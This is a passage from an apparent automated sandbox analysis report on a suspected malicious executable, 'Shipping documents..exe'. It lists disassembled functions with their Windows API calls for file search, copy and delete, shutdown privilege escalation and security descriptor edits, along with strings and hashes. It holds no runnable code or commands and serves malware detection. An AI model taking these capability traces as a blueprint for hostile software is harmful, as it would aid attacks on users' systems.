                                                                                                          Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2188072990-1173974218
                                                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                          Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 999945258-2428617273
                                                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                          Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                                                          Strings
                                                                                                          • Unterminated string, xrefs: 00428348
                                                                                                          • Error opening the file, xrefs: 00428231
                                                                                                          • _, xrefs: 0040371C
                                                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                          • API String ID: 3393021363-188983378
                                                                                                          • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                          • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                          Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1409584000-438819550
                                                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                          Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2192556992-3457252023
                                                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                          Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderPath$LocalTime__swprintf
                                                                                                          • String ID: %.3d
                                                                                                          • API String ID: 3337348382-986655627
                                                                                                          • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                          • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                          • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                          • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                          Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                            • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 2640511053-438819550
                                                                                                          • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                          • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                          • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                          • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                          Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                          • GetLastError.KERNEL32 ref: 00433414
                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                          • API String ID: 2938487562-3733053543
                                                                                                          • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                          • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                          • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                          • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                          Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                            • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                            • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                            • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255039815-0
                                                                                                          • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                          • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                          • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                          • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                          Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __swprintf.LIBCMT ref: 00433073
                                                                                                          • __swprintf.LIBCMT ref: 00433085
                                                                                                          • __wcsicoll.LIBCMT ref: 00433092
                                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                          • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                          • LockResource.KERNEL32(?), ref: 00433120
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
